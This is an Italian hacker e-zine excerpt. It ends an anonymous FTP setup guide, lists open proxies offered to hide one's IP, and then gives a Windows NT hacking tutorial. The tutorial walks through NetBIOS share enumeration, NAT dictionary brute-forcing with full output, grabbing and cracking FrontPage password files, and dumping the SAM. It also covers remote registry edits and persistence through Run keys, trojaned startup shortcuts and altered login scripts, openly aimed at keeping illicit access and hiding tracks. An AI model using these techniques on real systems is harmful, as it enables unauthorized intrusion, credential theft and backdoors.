Le copie dei file /etc/passwd e /etc/group che sono state copiate nella
directory /etc dell'FTP devono essere modificate per sostituire qualunque
password con un asterisco. Nei file /etc/passwd e /etc/group devono essere
eliminate tutte le voci, tranne quelle che appartengono ai login FTP anonimi
in modo da vere maggiore sicurezza

La directory /pub ,invece, puo' essere utilizzata per memorizzare i file che
volete rendere accessibili dagli utenti anonimi. Questa directory puo' essere
suddivisa in sottodirectory e i file che volete che l'utente anonimo abbia
possono essere semplicemente copiati.

Sicurezza

Siamo hackers ed abbiamo nemici hackers. Se qualcuno digita il comando
rm -rf /* siamo fottuti!
Ed e' per questo motivo che dovete utilizzare il comando chroot per fare
apparire la directory root qualcosa di diverso dalla directory effettiva /.
Se la directory e' impostata a /usr/-ftp/ con chroot, l'utente puo' essere
mantenuto all'interno della struttura dlla directory -ftp e puo' essere negato
l'accesso al sistema.

Per impostare i permessi della directory in modo che abbia solo i permessi di
lettura e esecuzione, utilizzate il seguente comando:

chmod 555 nome_dir

Dopo aver fatto tutto cio' provatevi a connetervi al vostro sistema via ftp e
fate un test. Se avete settato bene i permessi e non riuscirete ad accedere
alla directory root, significa che il vostro ftp e' ok.

Qui di seguito vi riporto un elenco di cose da fare per far funzionare meglio
l'FTP:

1. Create un account utente sul sistema denominato FTP
2. Impostate la directory home per l'utente ftp /home/ftp
3. Rendete il root proprietario della directory home FTP con il comando chown
root /usr/ftp
4. Utilizzate il comando chmod ugo -w /usr/ftp per non permettere a nessuno
di scrivere nella directory home dell'FTP
5. Create una directory /bin nella directory home /ftp e rendetela non
scrivibile e di proprieta' di root con i comandi chown e chmod utilizzati
in precedenza
6. Create una directory /etc e rendetela non scrivibile e di proprieta' di root
7. Inserite i file /etc/passwd e /etc/group nella directory /ftp/etc e
modificateli per eliminare tutto tranne l'utente ftp e group
8. Create la directory -ftp/pub/incoming e rendetela scrivibile da chiunque e
di proprieta' di root

Ora potete mettere su un bell'FTP. Mi raccomando chi fra voi lo mettera', mi
contatti ed io saro' molto contento di vederlo.
Vi serve un elenco dei comandi ftp? No problem, eccoli!

________________________________________________________________________
COMANDO AZIONE
------------------------------------------------------------------------
ASCII Seleziona la modalita' di trasferimento ASCII
------------------------------------------------------------------------
BINARY Seleziona la modalita' di trasferimento binaria
------------------------------------------------------------------------
CD Passa a una directory sul server FTP
------------------------------------------------------------------------
CLOSE Chiude la connessione
------------------------------------------------------------------------
DEL Cancella i file sul server
------------------------------------------------------------------------
DIR Visualizza la directory del server
------------------------------------------------------------------------
GET Scarica i file dal server
------------------------------------------------------------------------
HASH Elenca il progesso della trasmissione
------------------------------------------------------------------------
HELP Guida
------------------------------------------------------------------------
ICD Passa alla directory sulla macchina client
------------------------------------------------------------------------
MGET Serve per scaricare piu' file dall'FTP
------------------------------------------------------------------------
MPUT Trasferisce piu' file sull'FTP
------------------------------------------------------------------------
OPEN Si connette al server
------------------------------------------------------------------------
PUT Carica un file sul server
------------------------------------------------------------------------
PWD Visualizza la directory attiva del server
------------------------------------------------------------------------
QUOTE Fornisce direttamente un comando FTP
------------------------------------------------------------------------
QUIT Conclude una sessione FTP
________________________________________________________________________

Ecco fatto! Si e' concluso anche quest'altro articolo. Che fatica!

(-:(-:(-:(-NICK--):-):-):-)
(-:(-:(-:T0rment0 :-):-):-)
(-:(-:(-:(-:MAIL-):-):-):-)
(-:(-:urkes@hotmail.com :-)
(-:(-:(-:(-HOME--):-):-):-)
(-:come.to/hackernovello:-)
(-:(-:(-:(-::-):-):-):-):-)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ LISTA DI PROXY ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Consumo: 3 Gauloise blu che a detta di kualcuno spakkano (e a me
a letto con l'australiana hanno spakkato sicuramente)
Da mangiare niente perche' non e' il mio massimo desiderio
mangiare con 40 di frebbe

----------------------------------------------------------------------------

Ebbene si', vi ricordate tutti quegli amati computer che sono tanto gentili
da nascondere il vostro piccolo e numerico IP???? Ebbene per soddisfare
i gusti di tutte quelle brave persone che per un motivo o un altro sono
costretti a non lasciare tracce in giro per la rete, ecco una lista piu'
aggiornata della precedente di proxy server che non aspettano altro
che teneri e piccoli IP da mascherare. Mi raccomando, non ho ancora
potuto provarli per cause di forza maggiore, percio' non venite a reclama-
re al mio indirizzo se qualcuno di questi non funziona.

Server porta

noc.uncu.edu.ar 8080
proxy.co.rmit.edu.au 8080
conan.gocis.bg 8080
proxy.intermedia.cl 8080
webcache.ms.mff.cuni.cz 8080
proxye1-atm.maine.rr.com 8080
infosun-fd.rus.uni-stuttgart.de 8080
linux.softec.es 8080
nivel.ttaol.fi 8080
proxy.galactica.it 8080
www.go.com.jo 8080
zip-translator.dna.affrc.go.jp 3000
cvs2.kyunghee.ac.kr 8080
magicall2.dacom.co.kr 8080
proxy1.jaring.my 3128
mpls.cache.mr.net 3128
w3cache.us.edu.pl 8080
sunsite.icm.edu.pl 8080
proxy.qatar.net.qa 8080
bill.ostrabo.uddevalla.se 8080
proxy1.turnet.net.tr 8080
proxy2.turnet.net.tr 8080
episd.elpaso.k12.tx.us 8080
proxy.telekom.yu 8080
proxy.cybergate.co.zw 8080
cache.connect.ab.ca 3128
cache.sh.cvut.cz 3128
server.librarysafe.com 81
proxy.silcom.com: 3128
cache2.nlanr.pa-x.dec.com 3128
cache.vossnet.de 3128
otsun1f.dss.dornier.dasa.de 3128
dos2.esegi.es 3128
www-cache.kolumbus.fi 8080
proxy.spidernet.it 8080
sama.isc.kyutech.ac.jp 8080
proxy.kren.nm.kr 8080
proxy.snu.ac.kr 8080
proxy.intnet.mu 8080
chip.Austria.EU.net 8080
proxy.knoware.nl 8000
proxy.lofotposten.no 80
proxy.silk.org 3128
proxy.starnets.ro 3128
proxy.salekhard.ru 3333
hammer.overta.ru 3128
news.ntu.edu.sg 8080
yav.yacc.yakutia.su 8080
instanet.edex.net.uk 3128
dilbert.bb.cc.wa.us 3128
cache.new.co.za 8080
proxy.fh-reutlingen.de 3128
proxy1.rrze.uni-erlangen.de 80
ics2f.s.srv.t-online.de 80
infosun-fd.rus.uni-stuttgart.de 8080
www-cache.bosm.de 3128
rena.zfn.uni-bremen.de 3128
mordell.uni-muenster.de 3128
wwwproxy.allgaeu.org 80

Arrivederci e mi raccomando non divertitevi troppo eh!?!?!?!
SCIAMAN

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ HACKING di WINDOZZO NT ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

I. Strategie di Accesso (siamo all'inizio !)

1.) Condivisioni NetBIOS usando gli eseguibili Microzoz !
a. Gli altri usi di NET.EXE

2.) NAT: The NetBIOS Auditing Tool

II. Exploitiamo FrontPage

1.) Decriptazione delle Password di FrontPage su un server UNIX con
le estenzioni FRONTPAGE (Ahiahiahi !!!)

III. Vulnerabilita' nel registro di (s)configurazione !

1.) rdisk /s e famo un CORE DUMP (alla UNIX !) sul SAM (Security Account Manager)
2.) ottenere l'accesso al registro con il comando at.exe in locale ! :(
3.) REGEDT32.EXE e REGEDIT.EXE
4.) REGINI.EXE e REGDMP.EXE: Remote Registry Editing Tools
5.) Usiamo il registro per eseguire cose non volute dal SYS !! Hihi

IV. Figli di Troia: .lnk (collegamento, shortcuts)

1.) Piccoli problemi di (in)sicurezza di winnt\profiles e degli script di login !

V. Varie ed Eventuali (ma che e' l'assemblea di classe ?? Mah !)

=======================================================================
I. Strategie di Accesso (siamo all'inizio !)

C:\>NBTSTAT -A 123.123.123.123
C:\>NBTSTAT -a www.target.com

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Yeah, dopo che abbiamo trovato un po' di condivisioni, possiamo aggiungerle
al file LMHOSTS.

Esempio di LHOSTS file:

123.123.123.123 student1
24.3.9.12 target2

Ora possiamo usare o explorer per farci na navigata nelle direttori
condivise oppure usare NET.EXE:

C:\>net view 123.123.123.123
C:\>net view \\student1

RISORSE CONDIVISE IN 123.123.123.123

Share name Type Used as Comment

------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.

NOTA DI COLORE NERO: C$, ADMIN$ e IPC$ che sono condivisi non sono
visibili perche' NASCOSTI, HIDDEN... :(

C:\net use x: \\123.123.123.123\test
The command completed successfully.

Ora possiamo usare EXPLORER per accedere remotamente alla direttori
condivisa nel drive x:

C:\net use
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK X: \\123.123.123.123\test Microsoft Windows Network
OK \\123.123.123.123\test Microsoft Windows Network
The command completed successfully.

NET.EXE, vediamo cos'altro puo' fare... elencando alcuni comandi utili utili :)

NET localgroup <enter> mostrera' quali gruppi sono stati creati su quella macchina !

NET name <enter> mostrera' il nome del PC con cui siamo loggati !

NET accounts <enter> mostrera' il passwd con le resistrizioni per gli utenti

NET share <enter> mostrera' tutte le condivisioni coprese le $ che dovrebbero essere HIDDEN !

NET user <enter> mostrera' gli account creati.. Puo' essere utile quando si aggiunge
un utente al NAT per fare BRUTE FORCE delle condivisioni !

NET start SERVICE. Per esempio NET start SCHEDULE fara' partire l'utility di scheduling che puo'
essere usato per accedere completamente al registro su una macchina locale !

Questi sono i comandi fondamentali da conoscere di NET..

---- NAT ----

NAT (NetBIOS Auditing Tool)

Questa tecnica si basa sull'uso delle condivisioni ad accesso EVERYONE cioe' permessi per chiunque
altrimenti sara' necessario inserire una password... In pratica e' la stessa tecnica che si usa
su UNIX per montare sul proprio sistema degli export concessi a chiunque !!!

NAT.EXE (NetBIOS Auditing Tool)
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

OPTIONS
-o Specify the output file. All results from the scan
will be written to the specified file, in addition
to standard output.
-u Specify the file to read usernames from. Usernames
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Usernames should appear one per line in the speci-
fied file.
-p Specify the file to read passwords from. Passwords
will be read from the specified file when attempt-
ing to guess the password on the remote server.
Passwords should appear one per line in the speci-
fied file.
<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.

NAT.EXE fa tutto quello che e' necessario per riuscire ad ottenere l'accesso alle direttori
dell'amministratore, scansiona un range IP e usa un dizionario per crakkare le password del
NetBIOS. Come dire.. NAT e' il TOOL preferito da molti HACKERS....
Come nota vorrei aggiungere che uno strumento del genere esiste anche per ambiente UNIX-LIKE
il noto sscan. Questo oltre a controllare vulnerabilita' di UNIX, controlla, se lo trova,
anche le vulnerabilita' di NT eseguendo le stesse procedure di NAT. Quindi.. MEDITARE...

C:\GAMEZ\HACKING\TOOLS\nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt

[*]--- Checking host: 204.73.131.11
[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *
[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:

[*]--- This machine has a browse list:

Server Comment
--------- -------
STUDENT1

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$

[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON

[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access

P.S. Notare come l'output sia proprio uguale a quello mostrato da SSCAN.... quindi FUCK WIN !

=======================================================================
II. Exploitiamo FrontPage

La maggior parte degli exploit per Microsoft FrontPage ci daranno accesso a wwwroot e quindi
ci permetteranno solo di cambiare le pagine HTML (mi dici niente !) che in pratica e' la
tecnica usata da molti HACKERS (?? Come quelli che intendiamo noi ?? Mah !) per rendersi famosi..
vedi l'ultimo attakko al sito www.alt2600.com (azz Hack vs. Hack.. mih na chiavica !)

Iniziamo con un piccolo esempio di quello che si potrebbe trovare nella direttori remota di un
server che fa girare le estensioni server di frontpage BAGGATO !!

C:\InetPub\wwwroot <Home>
C:\InetPub\scripts /Scripts
C:\InetPub\wwwroot\_vti_bin /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut /_vti_bin/_vti_aut
C:\InetPub\cgi-bin /cgi-bin
C:\InetPub\wwwroot\srchadm /srchadm
C:\WINNT\System32\inetserv\iisadmin /iisadmin
C:\InetPub\wwwroot\_vti_pvt
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM Internet Information Index Server sample
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm /iisadmin/isadmin

Ora usando l'amico Frontpage, un hacker... o meglio ora anche un pivello ! potrebbe alterare
il contenuto delle pagine HTML su un sito remoto... e la cosa piu' bella e' che spesso sti server
sono senza pAsSwOrD... Vabbe lavoro in meno ! :)

Vabbe ora faccio un esempio con l'uso di WinCoz... ma vabbe.. non si muore.. dai Win e' bello !!
soprattutto quando mi dice "L'applicazione XXX ha commesso un errore di protezione generale" o
"Il sistema e' diventato instabile"... ma Bill non avra' fatto i test ?? Mah ... tralasciando...

OCCORRENTE:

Microsoft FrontPage Explorer installato sul proprio sistema.
Un sito WEB con un Sys MicroDipendente e particolarmente incapace :) <- FONDAMENTALE

PREMESSA

COSUMAZIONE: Danet Danone Gusto a Volonta' & Esta THE alla PESCA !
MUSICA ASCOLTATA: 883 (La donna il Sogno e il grande Incubo)
FILM GUARDATO: Delitti inquietanti su T+/G .. Con Seagal
ORE DEL GIORNO: 11.46
STATO: Alquanto incaxxato, e' arrivata la bolletta... :( LADRIIIIIII

Ok ora cominciamo con l'esempio

Aprire FrontPage Explorer e cliccare su File, Apri FrontPage WEB, al BOX che si presenta
selezionare Apri WEB esistente, e scegliere il web da aprire... Ah clikka su MORE WEB se
il nostro target non compare.... poi clikkiamo OK...
Se ci viene richiesto il nome dell'autore e la sua password allora dovremo crakkare il file
service.pwd oppure rimuoverlo (seeeee!).
Ora una volta accettati i parametri.. o gli cambi le pagine direttamente online.. oppure le scarichi
le modifichi e le UPLOADI !!! Come si preferisce.... tanto il sys e' coglioNe !

Scanning PORT 80 (http) or 443 (https) options:

GET /_vti_inf.html

GET /_vti_pvt/service.pwd # Ahaha le password criptate !
Okkio che non e' usato su IIS and WebSite servers :(

GET /_vti_pvt/authors.pwd #Su Netscape servers solo. Nome e password encrypted
degli autori !
GET /_vti_pvt/administrators.pwd

GET /_vti_log/author.log #Se c'e' sto file.. consiglio di pulirlo.. perche' ci sono
le tue tracce.. azz !

GET /samples/search/queryhit.htm

Mah io proverei anche a fare un FTP al server per vedere se mi scarica il service.pwd....

Attempt to connect to the server using FTP.
port 21
login anonymous
password guest@unknown
the anonymous login will use the internally created IISUSR_computername
account to assign NT permissions.
An incorrect configuration may leave areas vulnerable to attack.

Se abbiamo il file .pwd.. qui.. apparirebbe + o - cosi': Vacuum:SGXJVl6OJ9zkE

Mmmmm sembra il formato DES... anzi mi sa che e' proprio quello... non mi piace cosi' quell'account
lo voglio vedere come se fosse un UNIX... quindi lo modifico ....

Vacuum:SGXJVl6OJ9zkE:10:200:Vacuum:/users/Vacuum:/bin/bash

Hihih oh i numeri dopo la pass.. sono a caso.. e' solo per mettere il formatino DES !!!

Salviamolo in un file.. e mandiamo a lavoro l'amico John... sperando che decripti qualche cosa... e cmq
e' molto probabile che si usino password come nomi e cose del genere !!! Non ci crederete ma
ho trovato + bug (vecchi di miglioni di bit!) in italia che in altri paesi.. figuriamoci se non
ci si diverte con ste cose... mah W l'italia.... solo la BOXING non se po' fa' !! Mah e' da vedere...
ci so ste cose... TELEKOZ.. avra' altri errori .....

=================================================================================================
III. Vulnerabilita' nel registro di (s)configurazione !

Veloce veloce ecco un piccolo BUG (che non conoscevo ma che mi hanno gentilmente spiegato !!)
nel registro di WINZOZ.

E' sempre il solito e' vecchio CORE DUMP.. ma alla Microsoft... ora cerchero' di spiegarlo in modo
semplice....

RDISK con l'opzione /S eseguito sul sistema... copiera' una parte del registro di configurazione
o meglio la parte delle password.. in :\winnt\repair directory... Ma non e' tutto... questa opzione
ci permettera' di creare un disco di ripristino di emergenza .. qui c'e' uno .zip che contiene un
programma, il SAMDUMP.EXE, che permette di estrarre le password dal disketto di ripristino di emergenza !
Quindi.. in quella direttori ci sara' un sam._ file... Questo file e' ETICAMENTE (ma dai... ) usato per
il ripristino di emergenza delle password, cosi' se abbiamo accesso alla nostra macchina preferita possiamo
eseguire rdisk/s .. nello .zip c'e' il programma SAMDUMP.EXE per estrarre le password... quindi.. abbiamo
tutto.... Sinceramente non lo ho mai provato.. quindi non so se funziona.. cmq provare non fa male !

---- AT ----

Ecco un altro trucchetto che si puo' fare solo in locale pero' !! Meglio di niente !

NOTES about AT.EXE usage:

AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"

\\computername Specifies a remote computer. Commands are scheduled on the
local computer if this parameter is omitted.
id Is an identification number assigned to a scheduled
command.
/delete Cancels a scheduled command. If id is omitted, all the
scheduled commands on the computer are canceled.
/yes Used with cancel all jobs command when no further
confirmation is desired.
time Specifies the time when command is to run.
/interactive Allows the job to interact with the desktop of the user
who is logged on at the time the job runs.
/every:date[,...] Runs the command on each specified day(s) of the week or
month. If date is omitted, the current day of the month
is assumed.
/next:date[,...] Runs the specified command on the next occurrence of the
day (for example, next Thursday). If date is omitted, the
current day of the month is assumed.
"command" Is the Windows NT command, or batch program to be run.

La traduzione e' ovvia... ho fatto un paste dal prompt !

Cmq dal prompt della macchina NT possiamo digitare:

at <time> /interactive "regedt32.exe"
Added a new job with job ID = 0 # viene mostrato questo se ha funzionato ! Faccio riferimento
# alla versione inglese di NT

The service has not been started. #bhe non ha funzionato !

Avviando il registro ... avremo accesso a tutto il sistema NT.. e' chiaro che per fare tutte le
modifiche al nostro bene amato registro dovremo avere i privilegi di super utente e quel che e'
peggio dovremo essere su una macchina locale !

L'accesso base al registro di configurazione non permette di vedere le password e cmq possiamo
accedere allo stesso tramite WIN32 API RegConnectRegistry()

HKEY_LOCAL_MACHINE\
SYSTEM\
CurrentControlSet\
Control\
SecurePipeServers\
Winreg

Se non ci sono ste chiavi allora l'accesso remoto al registro non e' ristretto !

Questo e' quello che ci piace.. perche' se volessimo modificare il registro da remoto dovremo
sfruttare il programma REGEDT32.EXE..... naturalmente e' necessario avere i privilegi per
la modifica e/o la lettura delle chiavi del registro di configurazione. !!

Ecco come fare (avendo i privilegi !):

Avviamo REGEDT32.EXE

1. Sul menu FILE clikka su CONNECT
2. Inseriamo il nome del COMPUTER REMOTO !
3. Nell' "Users on Remote Computer dialog box", clikka l'user che e' loggato nella macchina !
Solitamente e' l'unico loggato !!!
4. Doppio-click su Local User per cambiare HKEY_CURRENT_USER Registry settings.
5. Doppio-click su Local Computer per cambiare HKEY_LOCAL_MACHINE Registry settings.
6. Ora su FILE, clikka SAVE.
7. Poi File menu, click Disconnect.

E' sempre chiaro che per accedere bisogna avere i permessi ! E poi di default si ha accesso a
solo le due chiavi HKEY_CURRENT_USER e HKEY_CURRENT_USER.

Quindi per modificare il registro da remoto tramite la linea di comando si puo' usare un programma
come REGINI.EXE

usage: REGINI [-h hivefile hiveroot | -w Win95 Directory | -m \\machinename]
[-i n] [-o outputWidth]
[-c] codepage
[-b] textFiles...

where: -h specifies a specify local hive to manipulate.
-w specifies the paths to a Windows 95 system.dat and user.dat files
-m specifies a remote Windows NT machine whose registry is to be manipulated.
-i n specifies the display indentation multiple. Default is 4
-o outputWidth specifies how wide the output is to be.

-c specifies codepage of textFiles, if they are ANSI textFiles.

-b specifies that REGINI should be backward compatible with older
versions of REGINI that did not strictly enforce line continuations
and quoted strings Specifically, REG_BINARY, REG_RESOURCE_LIST and
REG_RESOURCE_REQUIREMENTS_LIST data types did not need line
continuations after the first number that gave the size of the data.
It just kept looking on following lines until it found enough data
values to equal the data length or hit invalid input. Quoted
strings were only allowed in REG_MULTI_SZ. They could not be
specified around key or value names, or around values for REG_SZ or
REG_EXPAND_SZ Finally, the old REGINI did not support the semicolon
as an end of line comment character.

Tutto questo e' preso da un manuale per il REGINI.. quindi non lo ho scritto di mio pugno !

Idem per il seguente su REGDMP.EXE

usage: REGDMP [-m \\machinename | -h hivefile hiveroot | -w Win95 Directory]
[-i n] [-o outputWidth]
[-s] [-o outputWidth] registryPath

where: -m specifies a remote Windows NT machine whose registry is to be manipula
ted.
-h specifies a specify local hive to manipulate.
-w specifies the paths to a Windows 95 system.dat and user.dat files
-i n specifies the display indentation multiple. Default is 4
-o outputWidth specifies how wide the output is to be. By default the
outputWidth is set to the width of the console window if standard
output has not been redirected to a file. In the latter case, an
outputWidth of 240 is used.
-s specifies summary output. Value names, type and first line of data


--- USIAMO REGEDIT PER FARE COSE CHE IL SYS NON SA ! ---

Nota: Regedit esporta le chiavi del registro in un file chiamato .reg, il contenuto di questi
file puo' automaticamente modificare il registro stesso.. ed e' simile al textfile usato
con REGINI !

Per capire meglio.. usiamo un esempio, faciamo partire notepad.exe all'avvio (e' chiaro che
potremo sostituire qualsiasi file binario !)

-- inizia a tagliare da qui --
REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TMS"="notepad.exe"

-- finisci qui --

Quindi possiamo inserire nel registro qualunque cosa noi si voglia...
Bhe se vi siete stupiti di come possa essere scarna questa sezione.. basti pensare che e' solo
l'introduzione alla parte dei TROJAN per WINDOWS NT.

Quando si ha accesso ad un sistema, in questo caso WINDOWS NT, la cosa piu' importante oltre all'accesso
e all'occultamento delle tracce.. e' quello di MANTENERLO IL + A LUNGO POSSIBILE.
Come per UNIX, esistono tecniche di trojanizzazione sfruttando proprio dei servizi offerti dal
sistema operativo.

Prendiamo confidenza con il comando START....

C:\WINDOWS>start
Esegue una applicazione Windows o MS-DOS.

START [opzioni] programma [arg...]
START [opzioni] documento.ext

/m[inimized] Esegue la nuova applicazione minimizzata (in background).
/max[imized] Esegue la nuova applicazione massimizzata.
/r[estored] Ripristina la nuova applicazione (modalita' predefinita).
/w[ait] Aspetta che l'altra applicazione esca prima di ritornare.

Ora possiamo dire che per eseguire un file .exe .com. .bat o .cmd

C:\WINDOWS\COMMAND\START.EXE /m command.com /c trojan.bat (un esempio)

Se volessimo inserire una particolare riga nel registro di configurazione... allora:

C:\WINDOWS\COMMAND\START.EXE /m command.com /c trojan.reg

Ora questo collegamento puo' essere diffuso attraverso il dominio di NT tramite i PROFILI !

=================================================================================================
IV. Figli di Troia: .lnk (collegamento, shortcuts)

Sappiamo che i file .lnk sono dei collegamenti a dei file.. quindi possiamo aggiungerne qualcuno
come avvio .....

C:\WINNT\Profiles\Default User\Start Menu\Programs\Startup, possiamo metterne proprio uno qui !

oppure

C:\WINNT\Profiles\userid of exiting user\Start Menu\Programs\Startup ..

Il primo avviera' il nostro link... quando l'utente di default (GUEST) si loggera'.. mentre il
secondo avviera' il nostro link quando uno specifico utente loggera' nel sistema !

Ma se per esempio abbiamo i profiles attivati .. allora il nostro bel link seguira' l'user da
macchina a macchina...... Infatti se noi mettiamo il link nella direttori winnt\profiles\userid,
automaticamente si copiano in tutte le macchine nelle quali l'amicone si collega !
Ma se per caso non si riuscisse a copiare il nostro link trojano.. nella direttori profiles.. non
disperiamo, possiamo sempre cambiare qualche scriptino di login.

C:\WINNT\SYSTEM32\REPL\IMPORT\SCRIPTS

qui c'e' lo script di login (.CMD) .. quindi se noi mettiamo le nostre manacce su questo file e
diciamo li mettessimo qualche comandino esterno... tutti coloro che si loggano farebbero
eseguire alla macchina le nostre istruzioni.

C:\WINNT\PROFILES and C:\WINNT\SYSTEM32\REPL\IMPORT\SCRIPTS

Administrators Full Control
Everyone Read
System Full Control

Questo ci mostra i permessi standard degli export (NTFS)...

Noi possiamo sostituire i comandi normali con dei trojan... proprio come per UNIX.. mettere
backdoors.. fare tutto quello che si fa con UNIX...

Siamo giunti alla fine di questo viaggio all'interno di WINDOWS NT, spero che il tutto sia stato
convincente.. chiaro e soprattutto abbia fatto meditare sulle potenzialita' e sui grandi
problemi di sicurezza che affligono il mondo delle TELECOMUNICAZIONI.

Nessun Sistema e' al sicuro, nessun sistema e' inviolabile. Meditate gente, meditate.

=================================================================================================
V. VARIE ED EVENTUALI !

Se vi dicessi che sto guardando un demenziale film come "Mars Attak" puo' essere qualcosa ???
Sono le 15.51 e ho chiuso !

Alla prossima

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
